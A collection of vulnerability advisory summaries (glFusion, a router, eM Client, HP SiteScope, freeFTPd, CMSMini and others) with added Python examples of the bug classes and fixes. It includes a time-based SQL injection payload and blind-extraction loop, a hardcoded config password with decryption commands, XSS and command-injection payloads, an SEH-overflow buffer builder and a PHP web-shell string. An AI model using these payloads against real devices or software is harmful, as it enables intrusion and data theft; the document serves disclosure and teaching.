glFusion 1.3.0 is affected by a blind (time-based) SQL injection vulnerability in the Media Gallery plugin. The injection point is the cat_id parameter of a POST request to http://example.com/mediagallery/search.php; an example PoC value is: cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' and a response delayed by roughly 25 seconds confirms that the injected subquery was executed by MySQL.
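The following is an added example, not glFusion's code, showing the bug class behind the search.php injection and what a blind oracle lets an attacker do with it. It uses an in-memory SQLite table whose name, columns and rows are constructed stand-ins for the Media Gallery data (not the real schema); because SQLite has no SLEEP(), the "signal" is whether a known row comes back rather than a delay, but the extraction loop is the same one that would drive the page's time-based payload.

```python
import sqlite3

# Example code added to illustrate the glFusion search.php injection; it is
# not glFusion's code. The table, its columns and the rows are constructed
# stand-ins for the Media Gallery category data, not the real schema.
ROWS = [(1, "Landscapes"), (2, "Portraits"), (3, "Private")]
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mg_albums (cat_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO mg_albums VALUES (?, ?)", ROWS)
    return conn

def search_vulnerable(conn, cat_id):
    # The bug class: the cat_id request parameter is spliced into the SQL text,
    # so a quote in the value ends the string and the rest becomes SQL.
    sql = "SELECT title FROM mg_albums WHERE cat_id = '" + cat_id + "'"
    return [row[0] for row in conn.execute(sql)]

def search_fixed(conn, cat_id):
    # Bound parameter: the value is data only and cannot alter the query.
    sql = "SELECT title FROM mg_albums WHERE cat_id = ?"
    return [row[0] for row in conn.execute(sql, (cat_id,))]

def oracle(conn, condition):
    # A blind injection needs only one bit per request. Here the bit is
    # "did the cat_id 1 row come back"; with the page's payload the bit is
    # "did MySQL SLEEP(25) delay the response", and the loop below is the same.
    payload = "1' AND (" + condition + ") AND '1'='1"
    return search_vulnerable(conn, payload) == ["Landscapes"]

def extract_blind(conn, subquery, max_len=32):
    # Recovers the result of subquery one character at a time. substr() is
    # 1-indexed in both SQLite and MySQL.
    out = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            cond = "substr((%s), %d, 1) = '%s'" % (subquery, pos, ch)
            if oracle(conn, cond):
                out += ch
                break
        else:
            break  # no character matched: end of the value
    return out

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "' OR '1'='1"))   # every row: the WHERE is bypassed
    print(search_fixed(db, "' OR '1'='1"))        # []: the payload is just a value
    print(extract_blind(db, "SELECT title FROM mg_albums WHERE cat_id = 3"))
```

Against a real time-based target, oracle() would time the HTTP POST and return True when the response takes at least the SLEEP() interval; everything else in the loop stays as written, which is why a single confirmed delay is enough to treat the parameter as fully exploitable.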
The file provided to the end user for making a backup copy of the device configuration is encrypted with a hardcoded password. The device firmware creates the configuration file in three steps: - collect the configuration data to back up - encrypt the entries with the hardcoded password "sw5-superman" - prepend the file header produced by the tool "imghdr". An attacker who obtains an encrypted configuration file can decrypt its contents with the following commands: sh# dd if=config-file of=config-file-no-header bs=84 skip=1 sh# ccrypt -d -K sw5-superman config-file-no-header (the dd invocation discards the 84-byte header; ccrypt then decrypts the remainder with the hardcoded key). The decrypted file contains sensitive information that an attacker could use to compromise the target device (e.g., the admin password and the WPA passphrase). Furthermore, an attacker can craft their own configuration file, encrypt it with the hardcoded password, prepend a valid header, and upload the new configuration to the target device without authentication by exploiting the "Authentication bypass" issue described in this advisory. An attacker can also exploit the "Ping Test" feature exposed on the page "/System_Check.htm" to execute arbitrary commands on the device with root privileges; since "/System_Check.htm" does not require authentication in order to be accessed, this command injection is reachable without credentials.
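The "Ping Test" issue above is a classic command injection: a host string from the web form ends up on a shell command line. The following added example (not the device's firmware; the handler shape and parameter names are assumptions) shows the vulnerable construction, drives it through a shell with echo standing in for ping so the injected command visibly runs, and then the hardened form, which validates the target as a literal IP address and invokes ping with an argv list and no shell.

```python
import ipaddress
import shutil
import subprocess

# Example code added to illustrate the "Ping Test" command injection and its
# fix; it is not the device's firmware. Parameter names are assumptions.

def ping_cmdline_vulnerable(host):
    # Bug class: the user-controlled host is pasted into a shell command line,
    # so "127.0.0.1; id" runs a second command as the CGI's user (root here).
    return "ping -c 3 " + host

def simulate_vulnerable(host):
    # Runs the vulnerable command line through sh, with "echo" standing in for
    # ping so the demo needs no network. Returns None if sh is unavailable.
    if shutil.which("sh") is None:
        return None
    cmdline = "echo " + ping_cmdline_vulnerable(host)
    res = subprocess.run(["sh", "-c", cmdline], capture_output=True, text=True)
    return res.stdout

def validated_host(host):
    # Accept only a literal IPv4/IPv6 address; "8.8.8.8; id", "$(id)" or "-f"
    # are all rejected before anything reaches the command layer.
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        raise ValueError("ping target must be an IP address, got %r" % host)

def is_valid_host(host):
    try:
        validated_host(host)
        return True
    except ValueError:
        return False

def ping_argv_fixed(host):
    # argv list and no shell: the host is exactly one argument to ping, and
    # nothing in it is interpreted by a shell.
    return ["ping", "-c", "3", validated_host(host)]

def run_ping_fixed(host):
    # The hardened handler; ping may be absent offline, so tests only check
    # the argv construction.
    return subprocess.run(ping_argv_fixed(host), capture_output=True, text=True, timeout=15)

if __name__ == "__main__":
    print(simulate_vulnerable("127.0.0.1; echo INJECTED"))  # second command runs
    print(ping_argv_fixed("127.0.0.1"))
    try:
        ping_argv_fixed("127.0.0.1; echo INJECTED")
    except ValueError as err:
        print("rejected:", err)
```

The validation step matters even with an argv list: without it a value such as "-f" would still be handed to ping as an option, which is a different class of problem but one the same check closes. On the affected device, the missing authentication on /System_Check.htm means the vulnerable path is reachable by anyone who can talk to the web interface.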
eM Client for Windows is vulnerable to stored cross-site scripting (XSS). An attacker can send the victim an email whose body contains a malicious payload; when the message is opened or previewed, the payload executes and, in the PoC, displays an alert box. The injection point is the body of the email.
This module exploits a code execution flaw in HP SiteScope. The vulnerability exists in the opcactivate.vbs script, which is reachable through the APIBSMIntegrationImpl AXIS service and uses WScript.Shell.run() to execute cmd.exe with user-provided data. Note that the opcactivate.vbs component is installed with the (optional) HP Operations Agent component. The module has been tested successfully on HP SiteScope 11.20 (with HP Operations Agent) on Windows 2003 SP2.
Multiple vulnerabilities have been found in Sophos Web Protection Appliance that could allow an unauthenticated remote attacker to execute arbitrary OS commands and then escalate privileges to root within the appliance. The OS command injection vulnerability can be exploited by remote, unauthenticated attackers who can reach the appliance's web interface. The privilege escalation vulnerability allows an attacker who has already gained code execution on the appliance to escalate from the operating system user 'spiderman' to 'root'.
Multiple SQL injection and XSS vulnerabilities were found in Zyxware Health Monitoring System. The vulnerable parameters are strDiseaseName, opt, rightContent, mapheight, mapwidth and imageheight. An example XSS payload, reflected through the imagePadding parameter of maps/khmheading.php, is http://localhost/healthmonitor/maps/khmheading.php?imageheight=0&imagePadding=%22%3Cscript%3E%20alert%28%27XSS%27%29%3C/script%3E (the leading %22 is an encoded double quote that closes the attribute value the parameter is reflected into before the script tag is injected).
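The two XSS findings on this page call for two different fixes, so the following added example (not code from eM Client or Zyxware; the template string and the allowlist are assumptions) shows both: output encoding for a value reflected into an HTML attribute, as with the khmheading.php payload above, and an allowlist sanitizer for rich HTML that an application must render, as an email client must for a message body.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Example code added to illustrate both XSS cases on this page (eM Client's
# stored XSS in the email body and the reflected XSS in khmheading.php); it is
# not code from either product. The template and allowlists are assumptions.

# The page's khmheading.php payload, URL-decoded.
REFLECTED_PAYLOAD = unquote("%22%3Cscript%3E%20alert%28%27XSS%27%29%3C/script%3E")

def render_vulnerable(image_padding):
    # Reflects the parameter into an attribute value with no encoding, so the
    # leading double quote closes the attribute and the <script> tag follows.
    return '<img src="map.png" style="padding:' + image_padding + '">'

def render_fixed(image_padding):
    # html.escape with quote=True encodes <, >, &, " and ' so the value can
    # neither close the attribute nor start a tag.
    return '<img src="map.png" style="padding:' + html.escape(image_padding, quote=True) + '">'

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "ul", "ol", "li", "div", "span"}
DROPPED_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")

class EmailSanitizer(HTMLParser):
    # Allowlist sanitizer for a rich email body: unknown tags are removed but
    # their text is kept, script/style bodies are removed entirely, and only
    # href with a safe scheme survives (so on* handlers and javascript: URLs
    # never reach the rendered output).
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            if name == "href" and value and value.strip().lower().startswith(SAFE_SCHEMES):
                kept = ' href="%s"' % html.escape(value, quote=True)
        self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in DROPPED_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

def sanitize_email_body(body):
    parser = EmailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)

if __name__ == "__main__":
    print(render_vulnerable(REFLECTED_PAYLOAD))
    print(render_fixed(REFLECTED_PAYLOAD))
    print(sanitize_email_body('<p>Hi</p><script>alert(1)</script>'
                              '<a href="javascript:alert(1)" onclick="x()">link</a>'))
```

Encoding is the right tool when the value is meant to be text; a sanitizer is only needed when the application has to display attacker-supplied markup, and even then it should be an allowlist (keep what is known safe) rather than a blocklist of tags seen in past payloads.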
This module exploits an SEH-based stack buffer overflow in the PASS command of freeFTPd Server version 1.0.10. Credit goes to Wireghoul.
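As an added example of the payload layout an SEH overwrite like the one above relies on, the code below builds a PASS command buffer and shows where each piece lands. It is not the Metasploit module, and every number in it is an assumption: the offset to the SEH record, the pop/pop/ret address, the total length and the shellcode are placeholders, not values for freeFTPd 1.0.10.

```python
import struct

# Example code added to show how an SEH-overwrite payload is laid out; it is
# not the Metasploit module. All constants below are assumptions, not values
# for freeFTPd 1.0.10.
OFFSET_TO_NSEH = 800          # assumed distance from buffer start to nSEH
POP_POP_RET = 0x41424344      # assumed address of a pop/pop/ret gadget
TOTAL_LEN = 1500              # assumed total length to send
BAD_BYTES = (0x00, 0x0a, 0x0d)  # NUL and CRLF terminate the command line
JMP_SHORT_06 = b"\xeb\x06\x90\x90"  # jmp +6 over the SEH pointer, then two nops
SHELLCODE = b"\xcc" * 32            # constructed stand-in (int3 sled)

def has_bad_bytes(address):
    return any(b in BAD_BYTES for b in struct.pack("<I", address))

def build_seh_payload(offset=OFFSET_TO_NSEH, handler=POP_POP_RET,
                      shellcode=SHELLCODE, total_len=TOTAL_LEN):
    # Stack layout after the overflow:
    #   [filler][nSEH: jmp +6][SEH: pop/pop/ret][nop sled + shellcode][padding]
    # When the overwritten handler runs, pop/pop/ret returns into nSEH; the
    # 2-byte short jump there skips the 4-byte handler pointer and lands in
    # the nop sled that precedes the shellcode.
    if has_bad_bytes(handler):
        raise ValueError("handler address contains a byte that ends the PASS line")
    buf = b"A" * offset
    buf += JMP_SHORT_06
    buf += struct.pack("<I", handler)   # little-endian, as on x86
    buf += b"\x90" * 16 + shellcode
    if len(buf) > total_len:
        raise ValueError("payload exceeds total_len")
    return buf + b"C" * (total_len - len(buf))

def build_pass_command(payload):
    # The FTP command as sent on the wire; the CRLF terminator is why 0x0a
    # and 0x0d are bad bytes for anything inside the payload.
    return b"PASS " + payload + b"\r\n"

def locate_seh_record(payload, offset=OFFSET_TO_NSEH):
    # Returns (nSEH bytes, SEH handler address) as one would confirm them in a
    # debugger's SEH chain view after the crash.
    nseh = payload[offset:offset + 4]
    seh = struct.unpack("<I", payload[offset + 4:offset + 8])[0]
    return nseh, seh

if __name__ == "__main__":
    p = build_seh_payload()
    print(len(p), locate_seh_record(p))
    print(build_pass_command(p)[:16])
```

In practice the offset is found with a cyclic pattern, the gadget address with a module that lacks SafeSEH, and the bad-byte set by observing which bytes the server mangles; each of those replaces the placeholder constants above without changing the layout logic.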
This module exploits a missing DLL loaded by the 'IKE and AuthIP IPsec Keying Modules' (IKEEXT) service, which runs as SYSTEM and starts automatically in default installations from Windows Vista through Windows 8. It requires an insecure bin path, i.e. a directory on the service's DLL search path that the attacker can write to, in which to plant the DLL payload.
This vulnerability allows an attacker to gain complete access to and control over the CMS by sending a malicious POST request.
CMSMini is vulnerable to arbitrary file upload and CSRF. An attacker can upload a malicious file and trigger the action through CSRF; the uploaded shell is then reachable at http://[target/IP]/cmsmini/pages/cmd.php. An attacker can also delete pages through CSRF.
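The CMSMini advisory describes two missing controls, and the added example below shows what each looks like when present. It is not CMSMini code; the request shape, the session identifier, the extension allowlist and the magic-byte table are assumptions. A state-changing request without a valid session-bound CSRF token is refused before anything happens, and an upload is refused when any of its extensions is server-executable or its content does not match the claimed type, so a cmd.php shell (or a shell.php.png) is never written under pages/.

```python
import hashlib
import hmac
import os
import secrets

# Example code added to show the two controls CMSMini lacks according to the
# advisory: a session-bound CSRF token checked on state-changing requests and
# an upload filter that refuses server-executable files. Not CMSMini code; the
# request shape and the allowlists are assumptions.

SECRET = secrets.token_bytes(32)   # server-side key, generated per deployment
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
}

def csrf_token(session_id, secret=SECRET):
    # HMAC of the session id: a cross-site attacker's page can make the
    # victim's browser send cookies but cannot read or compute this value.
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()

def csrf_valid(session_id, presented, secret=SECRET):
    if presented is None:
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), presented)

def upload_allowed(filename, content):
    # Every suffix is checked, so shell.php.png fails on "php"; the magic bytes
    # must agree with the final extension, so PHP renamed to .png fails too.
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or any(p not in ALLOWED_EXT for p in parts[1:]):
        return False
    ext = parts[-1]
    if ext == "txt":
        return b"<?" not in content
    for magic, kind in MAGIC.items():
        if content.startswith(magic):
            return kind == ext or (kind == "jpg" and ext == "jpeg")
    return False

def handle_post(session_id, form, files):
    # Minimal handler: the CSRF check runs before any state change. Returns
    # (status, message) instead of writing anything, so it runs offline.
    if not csrf_valid(session_id, form.get("csrf_token")):
        return 403, "CSRF token missing or invalid"
    action = form.get("action")
    if action == "delete":
        return 200, "deleted " + form.get("page", "")
    if action == "upload":
        name, data = files["file"]
        if not upload_allowed(name, data):
            return 400, "file type not allowed"
        return 200, "stored " + os.path.basename(name)
    return 400, "unknown action"

if __name__ == "__main__":
    tok = csrf_token("session-1")
    print(handle_post("session-1", {"action": "delete", "page": "home"}, {}))
    print(handle_post("session-1", {"action": "upload", "csrf_token": tok},
                      {"file": ("cmd.php", b"<?php system($_GET['c']); ?>")}))
```

The token must be tied to the session and compared in constant time; a token that is the same for every user, or one checked with plain string equality, gives the forged request a way back in. The upload filter is deliberately an allowlist: listing ".php" as forbidden would miss .phtml, .phar and whatever else the web server's handler map accepts.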